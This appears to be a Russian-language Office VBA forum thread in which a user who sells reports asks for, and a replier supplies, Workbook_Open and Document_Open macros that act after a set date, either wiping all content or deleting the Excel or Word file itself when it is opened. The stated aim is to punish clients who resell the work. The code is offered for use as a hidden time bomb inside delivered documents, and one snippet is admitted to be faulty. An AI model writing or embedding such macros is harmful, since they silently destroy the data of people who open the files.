Здравствуйте уважаемые, в 2010 году я создавал тему по самоуничтожению файлов ексель путем макросов с проверкой по дате.
Sub Workbook_Open() If Date <= #12/31/2004# Then Exit Sub MsgBox "Сейчас рабочая книга будет удалена!" With ThisWorkbook .Saved = True .ChangeFileAccess xlReadOnly Kill .FullName .Close False End With End Sub
или
Sub Workbook_Open() 'Kill_Them_All Dim DateToKill As Variant Dim CurrDate As Variant Dim WS As Worksheet CurrDate = Date DateToKill = DateValue("18.06.2010" Set WS = Sheets(1) If DateToKill <= CurrDate Then For Each WS In Worksheets WS.Cells.Clear Next WS
End If Range("A1" .Select End Sub
В данный момент нуждаюсь в команде для файлов Ворд,
если кто то готов взяться, то готов оплатить в пределах разумного.
просмотрев работу заказчики говорят что их это не устраивает и отказываются от услуг
Может, проблема в вашей работе? Просматривая мои работы, заказчики всегда соглашаются с тем, что все работает как им того и хотелось...
По теме: не проще ли сделать так:
Код
Private Sub Document_Open()
If Date > #6/1/2010# Then
ThisDocument.Content = ""
ThisDocument.Save
ThisDocument.Close
End If
End Sub
или так: (но этот код выдаёт ошибку - сами доводите его до ума)
Код
Private Sub Document_Open()
If Date <= #12/31/2004# Then Exit Sub
' вообще-то, я бы такое сообщение не выводил...
' что мешает в момент появления сообщения создать копию файла, а потом нажать на ОК?
MsgBox "Сейчас документ будет удален!"
Application.DisplayAlerts = wdAlertsNone
With ThisDocument
FileName$ = .FullName
.SaveAs Environ("tmp") & "\RandomName.doc"
Kill FileName$
.Close False
End With
End Sub
EducatedFool пишет: Может, проблема в вашей работе?
я не правильно выразился, а точнее дело не в работе, а в культуре отдельных русских людей, которые перепродают чужие работы каким либо образом украв их у авторов, речи идет об отчетах в вордовских файлах .
Если будет нужен макрос для других программ из Офиса - не стесняйтесь, выкладывайте, форум же по Excel, а это часть Офиса... И вообще, Офис прописывается в реестр, а это часть системы... Короче - любые вопросы по С++, да и по другим языкам - милости просим. И не только по программированию.